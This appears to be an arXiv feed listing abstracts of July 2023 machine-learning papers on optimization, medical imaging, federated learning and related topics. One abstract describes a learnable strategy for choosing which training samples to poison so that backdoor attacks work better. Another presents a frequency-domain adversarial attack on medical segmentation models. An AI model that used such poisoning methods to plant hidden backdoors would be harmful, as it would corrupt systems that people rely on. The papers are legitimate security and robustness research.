    In this paper, we consider the decentralized, stochastic nonconvex strongly-concave (NCSC) minimax problem with nonsmooth regularization terms on both primal and dual variables, wherein a network of $m$ computing agents collaborate via peer-to-peer communications. We consider when the coupling function is in expectation or finite-sum form and the double regularizers are convex functions, applied separately to the primal and dual variables. Our algorithmic framework introduces a Lagrangian multiplier to eliminate the consensus constraint on the dual variable. Coupling this with variance-reduction (VR) techniques, our proposed method, entitled VRLM, by a single neighbor communication per iteration, is able to achieve an $\mathcal{O}(\kappa^3\varepsilon^{-3})$ sample complexity under the general stochastic setting, with either a big-batch or small-batch VR option, where $\kappa$ is the condition number of the problem and $\varepsilon$ is the desired solution accuracy. With a big-batch VR, we can additionally achieve $\mathcal{O}(\kappa^2\varepsilon^{-2})$ communication complexity. Under the special finite-sum setting, our method with a big-batch VR can achieve an $\mathcal{O}(n + \sqrt{n} \kappa^2\varepsilon^{-2})$ sample complexity and $\mathcal{O}(\kappa^2\varepsilon^{-2})$ communication complexity, where $n$ is the number of components in the finite sum. All complexity results match the best-known results achieved by a few existing methods for solving special cases of the problem we consider. To the best of our knowledge, this is the first work which provides convergence guarantees for NCSC minimax problems with general convex nonsmooth regularizers applied to both the primal and dual variables in the decentralized stochastic setting. Numerical experiments are conducted on two machine learning problems. Our code is downloadable from https://github.com/RPI-OPT/VRLM.
    Is Task-Agnostic Explainable AI a Myth?. (arXiv:2307.06963v1 [cs.AI])
    Our work serves as a framework for unifying the challenges of contemporary explainable AI (XAI). We demonstrate that while XAI methods provide supplementary and potentially useful output for machine learning models, researchers and decision-makers should be mindful of their conceptual and technical limitations, which frequently result in these methods themselves becoming black boxes. We examine three XAI research avenues spanning image, textual, and graph data, covering saliency, attention, and graph-type explainers. Despite the varying contexts and timeframes of the mentioned cases, the same persistent roadblocks emerge, highlighting the need for a conceptual breakthrough in the field to address the challenge of compatibility between XAI methods and application tasks.
    Frequency Domain Adversarial Training for Robust Volumetric Medical Segmentation. (arXiv:2307.07269v1 [eess.IV])
    It is imperative to ensure the robustness of deep learning models in critical applications such as, healthcare. While recent advances in deep learning have improved the performance of volumetric medical image segmentation models, these models cannot be deployed for real-world applications immediately due to their vulnerability to adversarial attacks. We present a 3D frequency domain adversarial attack for volumetric medical image segmentation models and demonstrate its advantages over conventional input or voxel domain attacks. Using our proposed attack, we introduce a novel frequency domain adversarial training approach for optimizing a robust model against voxel and frequency domain attacks. Moreover, we propose frequency consistency loss to regulate our frequency domain adversarial training that achieves a better tradeoff between model's performance on clean and adversarial samples. Code is publicly available at https://github.com/asif-hanif/vafa.
    Solving higher-order Lane-Emden-Fowler type equations using physics-informed neural networks: benchmark tests comparing soft and hard constraints. (arXiv:2307.07302v1 [physics.comp-ph])
    In this paper, numerical methods using Physics-Informed Neural Networks (PINNs) are presented with the aim to solve higher-order ordinary differential equations (ODEs). Indeed, this deep-learning technique is successfully applied for solving different classes of singular ODEs, namely the well known second-order Lane-Emden equations, third order-order Emden-Fowler equations, and fourth-order Lane-Emden-Fowler equations. Two variants of PINNs technique are considered and compared. First, a minimization procedure is used to constrain the total loss function of the neural network, in which the equation residual is considered with some weight to form a physics-based loss and added to the training data loss that contains the initial/boundary conditions. Second, a specific choice of trial solutions ensuring these conditions as hard constraints is done in order to satisfy the differential equation, contrary to the first variant based on training data where the constraints appear as soft ones. Advantages and drawbacks of PINNs variants are highlighted.
    Mitigating Adversarial Vulnerability through Causal Parameter Estimation by Adversarial Double Machine Learning. (arXiv:2307.07250v1 [cs.LG])
    Adversarial examples derived from deliberately crafted perturbations on visual inputs can easily harm decision process of deep neural networks. To prevent potential threats, various adversarial training-based defense methods have grown rapidly and become a de facto standard approach for robustness. Despite recent competitive achievements, we observe that adversarial vulnerability varies across targets and certain vulnerabilities remain prevalent. Intriguingly, such peculiar phenomenon cannot be relieved even with deeper architectures and advanced defense methods. To address this issue, in this paper, we introduce a causal approach called Adversarial Double Machine Learning (ADML), which allows us to quantify the degree of adversarial vulnerability for network predictions and capture the effect of treatments on outcome of interests. ADML can directly estimate causal parameter of adversarial perturbations per se and mitigate negative effects that can potentially damage robustness, bridging a causal perspective into the adversarial vulnerability. Through extensive experiments on various CNN and Transformer architectures, we corroborate that ADML improves adversarial robustness with large margins and relieve the empirical observation.
    Inverse Evolution Layers: Physics-informed Regularizers for Deep Neural Networks. (arXiv:2307.07344v1 [cs.LG])
    This paper proposes a novel approach to integrating partial differential equation (PDE)-based evolution models into neural networks through a new type of regularization. Specifically, we propose inverse evolution layers (IELs) based on evolution equations. These layers can achieve specific regularization objectives and endow neural networks' outputs with corresponding properties of the evolution models. Moreover, IELs are straightforward to construct and implement, and can be easily designed for various physical evolutions and neural networks. Additionally, the design process for these layers can provide neural networks with intuitive and mathematical interpretability, thus enhancing the transparency and explainability of the approach. To demonstrate the effectiveness, efficiency, and simplicity of our approach, we present an example of endowing semantic segmentation models with the smoothness property based on the heat diffusion model. To achieve this goal, we design heat-diffusion IELs and apply them to address the challenge of semantic segmentation with noisy labels. The experimental results demonstrate that the heat-diffusion IELs can effectively mitigate the overfitting problem caused by noisy labels.
    Knowledge Boosting: Rethinking Medical Contrastive Vision-Language Pre-Training. (arXiv:2307.07246v1 [cs.CV])
    The foundation models based on pre-training technology have significantly advanced artificial intelligence from theoretical to practical applications. These models have facilitated the feasibility of computer-aided diagnosis for widespread use. Medical contrastive vision-language pre-training, which does not require human annotations, is an effective approach for guiding representation learning using description information in diagnostic reports. However, the effectiveness of pre-training is limited by the large-scale semantic overlap and shifting problems in medical field. To address these issues, we propose the Knowledge-Boosting Contrastive Vision-Language Pre-training framework (KoBo), which integrates clinical knowledge into the learning of vision-language semantic consistency. The framework uses an unbiased, open-set sample-wise knowledge representation to measure negative sample noise and supplement the correspondence between vision-language mutual information and clinical knowledge. Extensive experiments validate the effect of our framework on eight tasks including classification, segmentation, retrieval, and semantic relatedness, achieving comparable or better performance with the zero-shot or few-shot settings. Our code is open on https://github.com/ChenXiaoFei-CS/KoBo.
    Visualizing Overlapping Biclusterings and Boolean Matrix Factorizations. (arXiv:2307.07396v1 [cs.LG])
    Finding (bi-)clusters in bipartite graphs is a popular data analysis approach. Analysts typically want to visualize the clusters, which is simple as long as the clusters are disjoint. However, many modern algorithms find overlapping clusters, making visualization more complicated. In this paper, we study the problem of visualizing \emph{a given clustering} of overlapping clusters in bipartite graphs and the related problem of visualizing Boolean Matrix Factorizations. We conceptualize three different objectives that any good visualization should satisfy: (1) proximity of cluster elements, (2) large consecutive areas of elements from the same cluster, and (3) large uninterrupted areas in the visualization, regardless of the cluster membership. We provide objective functions that capture these goals and algorithms that optimize these objective functions. Interestingly, in experiments on real-world datasets, we find that the best trade-off between these competing goals is achieved by a novel heuristic, which locally aims to place rows and columns with similar cluster membership next to each other.
    3D Shape-Based Myocardial Infarction Prediction Using Point Cloud Classification Networks. (arXiv:2307.07298v1 [cs.CV])
    Myocardial infarction (MI) is one of the most prevalent cardiovascular diseases with associated clinical decision-making typically based on single-valued imaging biomarkers. However, such metrics only approximate the complex 3D structure and physiology of the heart and hence hinder a better understanding and prediction of MI outcomes. In this work, we investigate the utility of complete 3D cardiac shapes in the form of point clouds for an improved detection of MI events. To this end, we propose a fully automatic multi-step pipeline consisting of a 3D cardiac surface reconstruction step followed by a point cloud classification network. Our method utilizes recent advances in geometric deep learning on point clouds to enable direct and efficient multi-scale learning on high-resolution surface models of the cardiac anatomy. We evaluate our approach on 1068 UK Biobank subjects for the tasks of prevalent MI detection and incident MI prediction and find improvements of ~13% and ~5% respectively over clinical benchmarks. Furthermore, we analyze the role of each ventricle and cardiac phase for 3D shape-based MI detection and conduct a visual analysis of the morphological and physiological patterns typically associated with MI outcomes.
    How Different Is Stereotypical Bias Across Languages?. (arXiv:2307.07331v1 [cs.CL])
    Recent studies have demonstrated how to assess the stereotypical bias in pre-trained English language models. In this work, we extend this branch of research in multiple different dimensions by systematically investigating (a) mono- and multilingual models of (b) different underlying architectures with respect to their bias in (c) multiple different languages. To that end, we make use of the English StereoSet data set (Nadeem et al., 2021), which we semi-automatically translate into German, French, Spanish, and Turkish. We find that it is of major importance to conduct this type of analysis in a multilingual setting, as our experiments show a much more nuanced picture as well as notable differences from the English-only analysis. The main takeaways from our analysis are that mGPT-2 (partly) shows surprising anti-stereotypical behavior across languages, English (monolingual) models exhibit the strongest bias, and the stereotypes reflected in the data set are least present in Turkish models. Finally, we release our codebase alongside the translated data sets and practical guidelines for the semi-automatic translation to encourage a further extension of our work to other languages.
    Reward-Directed Conditional Diffusion: Provable Distribution Estimation and Reward Improvement. (arXiv:2307.07055v1 [cs.LG])
    We explore the methodology and theory of reward-directed generation via conditional diffusion models. Directed generation aims to generate samples with desired properties as measured by a reward function, which has broad applications in generative AI, reinforcement learning, and computational biology. We consider the common learning scenario where the data set consists of unlabeled data along with a smaller set of data with noisy reward labels. Our approach leverages a learned reward function on the smaller data set as a pseudolabeler. From a theoretical standpoint, we show that this directed generator can effectively learn and sample from the reward-conditioned data distribution. Additionally, our model is capable of recovering the latent subspace representation of data. Moreover, we establish that the model generates a new population that moves closer to a user-specified target reward value, where the optimality gap aligns with the off-policy bandit regret in the feature subspace. The improvement in rewards obtained is influenced by the interplay between the strength of the reward signal, the distribution shift, and the cost of off-support extrapolation. We provide empirical results to validate our theory and highlight the relationship between the strength of extrapolation and the quality of generated samples.
    Graph Positional and Structural Encoder. (arXiv:2307.07107v1 [cs.LG])
    Positional and structural encodings (PSE) enable better identifiability of nodes within a graph, as in general graphs lack a canonical node ordering. This renders PSEs essential tools for empowering modern GNNs, and in particular graph Transformers. However, designing PSEs that work optimally for a variety of graph prediction tasks is a challenging and unsolved problem. Here, we present the graph positional and structural encoder (GPSE), a first-ever attempt to train a graph encoder that captures rich PSE representations for augmenting any GNN. GPSE can effectively learn a common latent representation for multiple PSEs, and is highly transferable. The encoder trained on a particular graph dataset can be used effectively on datasets drawn from significantly different distributions and even modalities. We show that across a wide range of benchmarks, GPSE-enhanced models can significantly improve the performance in certain tasks, while performing on par with those that employ explicitly computed PSEs in other cases. Our results pave the way for the development of large pre-trained models for extracting graph positional and structural information and highlight their potential as a viable alternative to explicitly computed PSEs as well as to existing self-supervised pre-training approaches.
    Performance of $\ell_1$ Regularization for Sparse Convex Optimization. (arXiv:2307.07405v1 [cs.LG])
    Despite widespread adoption in practice, guarantees for the LASSO and Group LASSO are strikingly lacking in settings beyond statistical problems, and these algorithms are usually considered to be a heuristic in the context of sparse convex optimization on deterministic inputs. We give the first recovery guarantees for the Group LASSO for sparse convex optimization with vector-valued features. We show that if a sufficiently large Group LASSO regularization is applied when minimizing a strictly convex function $l$, then the minimizer is a sparse vector supported on vector-valued features with the largest $\ell_2$ norm of the gradient. Thus, repeating this procedure selects the same set of features as the Orthogonal Matching Pursuit algorithm, which admits recovery guarantees for any function $l$ with restricted strong convexity and smoothness via weak submodularity arguments. This answers open questions of Tibshirani et al. and Yasuda et al. Our result is the first to theoretically explain the empirical success of the Group LASSO for convex functions under general input instances assuming only restricted strong convexity and smoothness. Our result also generalizes provable guarantees for the Sequential Attention algorithm, which is a feature selection algorithm inspired by the attention mechanism proposed by Yasuda et al. As an application of our result, we give new results for the column subset selection problem, which is well-studied when the loss is the Frobenius norm or other entrywise matrix losses. We give the first result for general loss functions for this problem that requires only restricted strong convexity and smoothness.
    Expressive Monotonic Neural Networks. (arXiv:2307.07512v1 [cs.LG])
    The monotonic dependence of the outputs of a neural network on some of its inputs is a crucial inductive bias in many scenarios where domain knowledge dictates such behavior. This is especially important for interpretability and fairness considerations. In a broader context, scenarios in which monotonicity is important can be found in finance, medicine, physics, and other disciplines. It is thus desirable to build neural network architectures that implement this inductive bias provably. In this work, we propose a weight-constrained architecture with a single residual connection to achieve exact monotonic dependence in any subset of the inputs. The weight constraint scheme directly controls the Lipschitz constant of the neural network and thus provides the additional benefit of robustness. Compared to currently existing techniques used for monotonicity, our method is simpler in implementation and in theory foundations, has negligible computational overhead, is guaranteed to produce monotonic dependence, and is highly expressive. We show how the algorithm is used to train powerful, robust, and interpretable discriminators that achieve competitive performance compared to current state-of-the-art methods across various benchmarks, from social applications to the classification of the decays of subatomic particles produced at the CERN Large Hadron Collider.
    Machine Learning-Assisted Pattern Recognition Algorithms for Estimating Ultimate Tensile Strength in Fused Deposition Modeled Polylactic Acid Specimens. (arXiv:2307.06970v1 [cs.LG])
    In this study, we investigate the application of supervised machine learning algorithms for estimating the Ultimate Tensile Strength (UTS) of Polylactic Acid (PLA) specimens fabricated using the Fused Deposition Modeling (FDM) process. A total of 31 PLA specimens were prepared, with Infill Percentage, Layer Height, Print Speed, and Extrusion Temperature serving as input parameters. The primary objective was to assess the accuracy and effectiveness of four distinct supervised classification algorithms, namely Logistic Classification, Gradient Boosting Classification, Decision Tree, and K-Nearest Neighbor, in predicting the UTS of the specimens. The results revealed that while the Decision Tree and K-Nearest Neighbor algorithms both achieved an F1 score of 0.71, the KNN algorithm exhibited a higher Area Under the Curve (AUC) score of 0.79, outperforming the other algorithms. This demonstrates the superior ability of the KNN algorithm in differentiating between the two classes of ultimate tensile strength within the dataset, rendering it the most favorable choice for classification in the context of this research. This study represents the first attempt to estimate the UTS of PLA specimens using machine learning-based classification algorithms, and the findings offer valuable insights into the potential of these techniques in improving the performance and accuracy of predictive models in the domain of additive manufacturing.
    On Interpolating Experts and Multi-Armed Bandits. (arXiv:2307.07264v1 [cs.LG])
    Learning with expert advice and multi-armed bandit are two classic online decision problems which differ on how the information is observed in each round of the game. We study a family of problems interpolating the two. For a vector $\mathbf{m}=(m_1,\dots,m_K)\in \mathbb{N}^K$, an instance of $\mathbf{m}$-MAB indicates that the arms are partitioned into $K$ groups and the $i$-th group contains $m_i$ arms. Once an arm is pulled, the losses of all arms in the same group are observed. We prove tight minimax regret bounds for $\mathbf{m}$-MAB and design an optimal PAC algorithm for its pure exploration version, $\mathbf{m}$-BAI, where the goal is to identify the arm with minimum loss with as few rounds as possible. We show that the minimax regret of $\mathbf{m}$-MAB is $\Theta\left(\sqrt{T\sum_{k=1}^K\log (m_k+1)}\right)$ and the minimum number of pulls for an $(\epsilon,0.05)$-PAC algorithm of $\mathbf{m}$-BAI is $\Theta\left(\frac{1}{\epsilon^2}\cdot \sum_{k=1}^K\log (m_k+1)\right)$. Both our upper bounds and lower bounds for $\mathbf{m}$-MAB can be extended to a more general setting, namely the bandit with graph feedback, in terms of the clique cover and related graph parameters. As consequences, we obtained tight minimax regret bounds for several families of feedback graphs.
    Pathway toward prior knowledge-integrated machine learning in engineering. (arXiv:2307.06950v1 [cs.AI])
    Despite the digitalization trend and data volume surge, first-principles models (also known as logic-driven, physics-based, rule-based, or knowledge-based models) and data-driven approaches have existed in parallel, mirroring the ongoing AI debate on symbolism versus connectionism. Research for process development to integrate both sides to transfer and utilize domain knowledge in the data-driven process is rare. This study emphasizes efforts and prevailing trends to integrate multidisciplinary domain professions into machine acknowledgeable, data-driven processes in a two-fold organization: examining information uncertainty sources in knowledge representation and exploring knowledge decomposition with a three-tier knowledge-integrated machine learning paradigm. This approach balances holist and reductionist perspectives in the engineering domain.
    AI For Global Climate Cooperation 2023 Competition Proceedings. (arXiv:2307.06951v1 [cs.AI])
    The international community must collaborate to mitigate climate change and sustain economic growth. However, collaboration is hard to achieve, partly because no global authority can ensure compliance with international climate agreements. Combining AI with climate-economic simulations offers a promising solution to design international frameworks, including negotiation protocols and climate agreements, that promote and incentivize collaboration. In addition, these frameworks should also have policy goals fulfillment, and sustained commitment, taking into account climate-economic dynamics and strategic behaviors. These challenges require an interdisciplinary approach across machine learning, economics, climate science, law, policy, ethics, and other fields. Towards this objective, we organized AI for Global Climate Cooperation, a Mila competition in which teams submitted proposals and analyses of international frameworks, based on (modifications of) RICE-N, an AI-driven integrated assessment model (IAM). In particular, RICE-N supports modeling regional decision-making using AI agents. Furthermore, the IAM then models the climate-economic impact of those decisions into the future. Whereas the first track focused only on performance metrics, the proposals submitted to the second track were evaluated both quantitatively and qualitatively. The quantitative evaluation focused on a combination of (i) the degree of mitigation of global temperature rise and (ii) the increase in economic productivity. On the other hand, an interdisciplinary panel of human experts in law, policy, sociology, economics and environmental science, evaluated the solutions qualitatively. In particular, the panel considered the effectiveness, simplicity, feasibility, ethics, and notions of climate justice of the protocols. In the third track, the participants were asked to critique and improve RICE-N.
    Learning Sparse Neural Networks with Identity Layers. (arXiv:2307.07389v1 [cs.LG])
    The sparsity of Deep Neural Networks is well investigated to maximize the performance and reduce the size of overparameterized networks as possible. Existing methods focus on pruning parameters in the training process by using thresholds and metrics. Meanwhile, feature similarity between different layers has not been discussed sufficiently before, which could be rigorously proved to be highly correlated to the network sparsity in this paper. Inspired by interlayer feature similarity in overparameterized models, we investigate the intrinsic link between network sparsity and interlayer feature similarity. Specifically, we prove that reducing interlayer feature similarity based on Centered Kernel Alignment (CKA) improves the sparsity of the network by using information bottleneck theory. Applying such theory, we propose a plug-and-play CKA-based Sparsity Regularization for sparse network training, dubbed CKA-SR, which utilizes CKA to reduce feature similarity between layers and increase network sparsity. In other words, layers of our sparse network tend to have their own identity compared to each other. Experimentally, we plug the proposed CKA-SR into the training process of sparse network training methods and find that CKA-SR consistently improves the performance of several State-Of-The-Art sparse training methods, especially at extremely high sparsity. Code is included in the supplementary materials.
    AIC-AB NET: A Neural Network for Image Captioning with Spatial Attention and Text Attributes. (arXiv:2307.07370v1 [cs.CV])
    Image captioning is a significant field across computer vision and natural language processing. We propose and present AIC-AB NET, a novel Attribute-Information-Combined Attention-Based Network that combines spatial attention architecture and text attributes in an encoder-decoder. For caption generation, adaptive spatial attention determines which image region best represents the image and whether to attend to the visual features or the visual sentinel. Text attribute information is synchronously fed into the decoder to help image recognition and reduce uncertainty. We have tested and evaluated our AICAB NET on the MS COCO dataset and a new proposed Fashion dataset. The Fashion dataset is employed as a benchmark of single-object images. The results show the superior performance of the proposed model compared to the state-of-the-art baseline and ablated models on both the images from MSCOCO and our single-object images. Our AIC-AB NET outperforms the baseline adaptive attention network by 0.017 (CIDEr score) on the MS COCO dataset and 0.095 (CIDEr score) on the Fashion dataset.
    Higher-order topological kernels via quantum computation. (arXiv:2307.07383v1 [quant-ph])
    Topological data analysis (TDA) has emerged as a powerful tool for extracting meaningful insights from complex data. TDA enhances the analysis of objects by embedding them into a simplicial complex and extracting useful global properties such as the Betti numbers, i.e. the number of multidimensional holes, which can be used to define kernel methods that are easily integrated with existing machine-learning algorithms. These kernel methods have found broad applications, as they rely on powerful mathematical frameworks which provide theoretical guarantees on their performance. However, the computation of higher-dimensional Betti numbers can be prohibitively expensive on classical hardware, while quantum algorithms can approximate them in polynomial time in the instance size. In this work, we propose a quantum approach to defining topological kernels, which is based on constructing Betti curves, i.e. topological fingerprint of filtrations with increasing order. We exhibit a working prototype of our approach implemented on a noiseless simulator and show its robustness by means of some empirical results suggesting that topological approaches may offer an advantage in quantum machine learning.
    LINFA: a Python library for variational inference with normalizing flow and annealing. (arXiv:2307.04675v2 [cs.LG] UPDATED)
    Variational inference is an increasingly popular method in statistics and machine learning for approximating probability distributions. We developed LINFA (Library for Inference with Normalizing Flow and Annealing), a Python library for variational inference to accommodate computationally expensive models and difficult-to-sample distributions with dependent parameters. We discuss the theoretical background, capabilities, and performance of LINFA in various benchmarks. LINFA is publicly available on GitHub at https://github.com/desResLab/LINFA.
    MGit: A Model Versioning and Management System. (arXiv:2307.07507v1 [cs.LG])
    Models derived from other models are extremely common in machine learning (ML) today. For example, transfer learning is used to create task-specific models from "pre-trained" models through finetuning. This has led to an ecosystem where models are related to each other, sharing structure and often even parameter values. However, it is hard to manage these model derivatives: the storage overhead of storing all derived models quickly becomes onerous, prompting users to get rid of intermediate models that might be useful for further analysis. Additionally, undesired behaviors in models are hard to track down (e.g., is a bug inherited from an upstream model?). In this paper, we propose a model versioning and management system called MGit that makes it easier to store, test, update, and collaborate on model derivatives. MGit introduces a lineage graph that records provenance and versioning information between models, optimizations to efficiently store model parameters, as well as abstractions over this lineage graph that facilitate relevant testing, updating and collaboration functionality. MGit is able to reduce the lineage graph's storage footprint by up to 7x and automatically update downstream models in response to updates to upstream models.
    Signed iterative random forests to identify enhancer-associated transcription factor binding. (arXiv:1810.07287v2 [stat.ML] UPDATED)
    Standard ChIP-seq peak calling pipelines seek to differentiate biochemically reproducible signals of individual genomic elements from background noise. However, reproducibility alone does not imply functional regulation (e.g., enhancer activation, alternative splicing). Here we present a general-purpose, interpretable machine learning method: signed iterative random forests (siRF), which we use to infer regulatory interactions among transcription factors and functional binding signatures surrounding enhancer elements in Drosophila melanogaster.
    HuCurl: Human-induced Curriculum Discovery. (arXiv:2307.07412v1 [cs.LG])
    We introduce the problem of curriculum discovery and describe a curriculum learning framework capable of discovering effective curricula in a curriculum space based on prior knowledge about sample difficulty. Using annotation entropy and loss as measures of difficulty, we show that (i): the top-performing discovered curricula for a given model and dataset are often non-monotonic as opposed to monotonic curricula in existing literature, (ii): the prevailing easy-to-hard or hard-to-easy transition curricula are often at the risk of underperforming, and (iii): the curricula discovered for smaller datasets and models perform well on larger datasets and models respectively. The proposed framework encompasses some of the existing curriculum learning approaches and can discover curricula that outperform them across several NLP tasks.
    Boosting Backdoor Attack with A Learnable Poisoning Sample Selection Strategy. (arXiv:2307.07328v1 [cs.CR])
    Data-poisoning based backdoor attacks aim to insert backdoor into models by manipulating training datasets without controlling the training process of the target model. Existing attack methods mainly focus on designing triggers or fusion strategies between triggers and benign samples. However, they often randomly select samples to be poisoned, disregarding the varying importance of each poisoning sample in terms of backdoor injection. A recent selection strategy filters a fixed-size poisoning sample pool by recording forgetting events, but it fails to consider the remaining samples outside the pool from a global perspective. Moreover, computing forgetting events requires significant additional computing resources. Therefore, how to efficiently and effectively select poisoning samples from the entire dataset is an urgent problem in backdoor attacks.To address it, firstly, we introduce a poisoning mask into the regular backdoor training loss. We suppose that a backdoored model training with hard poisoning samples has a more backdoor effect on easy ones, which can be implemented by hindering the normal training process (\ie, maximizing loss \wrt mask). To further integrate it with normal training process, we then propose a learnable poisoning sample selection strategy to learn the mask together with the model parameters through a min-max optimization.Specifically, the outer loop aims to achieve the backdoor attack goal by minimizing the loss based on the selected samples, while the inner loop selects hard poisoning samples that impede this goal by maximizing the loss. After several rounds of adversarial training, we finally select effective poisoning samples with high contribution. Extensive experiments on benchmark datasets demonstrate the effectiveness and efficiency of our approach in boosting backdoor attack performance.
    Defect Classification in Additive Manufacturing Using CNN-Based Vision Processing. (arXiv:2307.07378v1 [cs.CV])
    The development of computer vision and in-situ monitoring using visual sensors allows the collection of large datasets from the additive manufacturing (AM) process. Such datasets could be used with machine learning techniques to improve the quality of AM. This paper examines two scenarios: first, using convolutional neural networks (CNNs) to accurately classify defects in an image dataset from AM and second, applying active learning techniques to the developed classification model. This allows the construction of a human-in-the-loop mechanism to reduce the size of the data required to train and generate training data.
    Controllable Emphasis with zero data for text-to-speech. (arXiv:2307.07062v1 [eess.AS])
    We present a scalable method to produce high quality emphasis for text-to-speech (TTS) that does not require recordings or annotations. Many TTS models include a phoneme duration model. A simple but effective method to achieve emphasized speech consists in increasing the predicted duration of the emphasised word. We show that this is significantly better than spectrogram modification techniques improving naturalness by $7.3\%$ and correct testers' identification of the emphasized word in a sentence by $40\%$ on a reference female en-US voice. We show that this technique significantly closes the gap to methods that require explicit recordings. The method proved to be scalable and preferred in all four languages tested (English, Spanish, Italian, German), for different voices and multiple speaking styles.
    Improving Zero-Shot Generalization for CLIP with Synthesized Prompts. (arXiv:2307.07397v1 [cs.CV])
    With the growing interest in pretrained vision-language models like CLIP, recent research has focused on adapting these models to downstream tasks. Despite achieving promising results, most existing methods require labeled data for all classes, which may not hold in real-world applications due to the long tail and Zipf's law. For example, some classes may lack labeled data entirely, such as emerging concepts. To address this problem, we propose a plug-and-play generative approach called \textbf{S}ynt\textbf{H}es\textbf{I}zed \textbf{P}rompts~(\textbf{SHIP}) to improve existing fine-tuning methods. Specifically, we follow variational autoencoders to introduce a generator that reconstructs the visual features by inputting the synthesized prompts and the corresponding class names to the textual encoder of CLIP. In this manner, we easily obtain the synthesized features for the remaining label-only classes. Thereafter, we fine-tune CLIP with off-the-shelf methods by combining labeled and synthesized features. Extensive experiments on base-to-new generalization, cross-dataset transfer learning, and generalized zero-shot learning demonstrate the superiority of our approach. The code is available at \url{https://github.com/mrflogs/SHIP}.
    Atlas-Based Interpretable Age Prediction. (arXiv:2307.07439v1 [eess.IV])
    Age prediction is an important part of medical assessments and research. It can aid in detecting diseases as well as abnormal ageing by highlighting the discrepancy between chronological and biological age. To gain a comprehensive understanding of age-related changes observed in various body parts, we investigate them on a larger scale by using whole-body images. We utilise the Grad-CAM interpretability method to determine the body areas most predictive of a person's age. We expand our analysis beyond individual subjects by employing registration techniques to generate population-wide interpretability maps. Furthermore, we set state-of-the-art whole-body age prediction with a model that achieves a mean absolute error of 2.76 years. Our findings reveal three primary areas of interest: the spine, the autochthonous back muscles, and the cardiac region, which exhibits the highest importance.
    Data Augmentation for Mathematical Objects. (arXiv:2307.06984v1 [cs.SC])
    This paper discusses and evaluates ideas of data balancing and data augmentation in the context of mathematical objects: an important topic for both the symbolic computation and satisfiability checking communities, when they are making use of machine learning techniques to optimise their tools. We consider a dataset of non-linear polynomial problems and the problem of selecting a variable ordering for cylindrical algebraic decomposition to tackle these with. By swapping the variable names in already labelled problems, we generate new problem instances that do not require any further labelling when viewing the selection as a classification problem. We find this augmentation increases the accuracy of ML models by 63% on average. We study what part of this improvement is due to the balancing of the dataset and what is achieved thanks to further increasing the size of the dataset, concluding that both have a very significant effect. We finish the paper by reflecting on how this idea could be applied in other uses of machine learning in mathematics.
    Population Expansion for Training Language Models with Private Federated Learning. (arXiv:2307.07477v1 [cs.LG])
    Federated learning (FL) combined with differential privacy (DP) offers machine learning (ML) training with distributed devices and with a formal privacy guarantee. With a large population of devices, FL with DP produces a performant model in a timely manner. However, for applications with a smaller population, not only does the model utility degrade as the DP noise is inversely proportional to population, but also the training latency increases since waiting for enough clients to become available from a smaller pool is slower. In this work, we thus propose expanding the population based on domain adaptation techniques to speed up the training and improves the final model quality when training with small populations. We empirically demonstrate that our techniques can improve the utility by 13% to 30% on real-world language modeling datasets.
    Improved Convergence Analysis and SNR Control Strategies for Federated Learning in the Presence of Noise. (arXiv:2307.07406v1 [cs.LG])
    We propose an improved convergence analysis technique that characterizes the distributed learning paradigm of federated learning (FL) with imperfect/noisy uplink and downlink communications. Such imperfect communication scenarios arise in the practical deployment of FL in emerging communication systems and protocols. The analysis developed in this paper demonstrates, for the first time, that there is an asymmetry in the detrimental effects of uplink and downlink communications in FL. In particular, the adverse effect of the downlink noise is more severe on the convergence of FL algorithms. Using this insight, we propose improved Signal-to-Noise (SNR) control strategies that, discarding the negligible higher-order terms, lead to a similar convergence rate for FL as in the case of a perfect, noise-free communication channel while incurring significantly less power resources compared to existing solutions. In particular, we establish that to maintain the $O(\frac{1}{\sqrt{K}})$ rate of convergence like in the case of noise-free FL, we need to scale down the uplink and downlink noise by $\Omega({\sqrt{k}})$ and $\Omega({k})$ respectively, where $k$ denotes the communication round, $k=1,\dots, K$. Our theoretical result is further characterized by two major benefits: firstly, it does not assume the somewhat unrealistic assumption of bounded client dissimilarity, and secondly, it only requires smooth non-convex loss functions, a function class better suited for modern machine learning and deep learning models. We also perform extensive empirical analysis to verify the validity of our theoretical findings.
    Embracing the chaos: analysis and diagnosis of numerical instability in variational flows. (arXiv:2307.06957v1 [stat.ML])
    In this paper, we investigate the impact of numerical instability on the reliability of sampling, density evaluation, and evidence lower bound (ELBO) estimation in variational flows. We first empirically demonstrate that common flows can exhibit a catastrophic accumulation of error: the numerical flow map deviates significantly from the exact map -- which affects sampling -- and the numerical inverse flow map does not accurately recover the initial input -- which affects density and ELBO computations. Surprisingly though, we find that results produced by flows are often accurate enough for applications despite the presence of serious numerical instability. In this work, we treat variational flows as dynamical systems, and leverage shadowing theory to elucidate this behavior via theoretical guarantees on the error of sampling, density evaluation, and ELBO estimation. Finally, we develop and empirically test a diagnostic procedure that can be used to validate results produced by numerically unstable flows in practice.
    Rician likelihood loss for quantitative MRI using self-supervised deep learning. (arXiv:2307.07072v1 [cs.LG])
    Purpose: Previous quantitative MR imaging studies using self-supervised deep learning have reported biased parameter estimates at low SNR. Such systematic errors arise from the choice of Mean Squared Error (MSE) loss function for network training, which is incompatible with Rician-distributed MR magnitude signals. To address this issue, we introduce the negative log Rician likelihood (NLR) loss. Methods: A numerically stable and accurate implementation of the NLR loss was developed to estimate quantitative parameters of the apparent diffusion coefficient (ADC) model and intra-voxel incoherent motion (IVIM) model. Parameter estimation accuracy, precision and overall error were evaluated in terms of bias, variance and root mean squared error and compared against the MSE loss over a range of SNRs (5 - 30). Results: Networks trained with NLR loss show higher estimation accuracy than MSE for the ADC and IVIM diffusion coefficients as SNR decreases, with minimal loss of precision or total error. At high effective SNR (high SNR and small diffusion coefficients), both losses show comparable accuracy and precision for all parameters of both models. Conclusion: The proposed NLR loss is numerically stable and accurate across the full range of tested SNRs and improves parameter estimation accuracy of diffusion coefficients using self-supervised deep learning. We expect the development to benefit quantitative MR imaging techniques broadly, enabling more accurate parameter estimation from noisy data.
    Conditionally Optimistic Exploration for Cooperative Deep Multi-Agent Reinforcement Learning. (arXiv:2303.09032v2 [cs.LG] UPDATED)
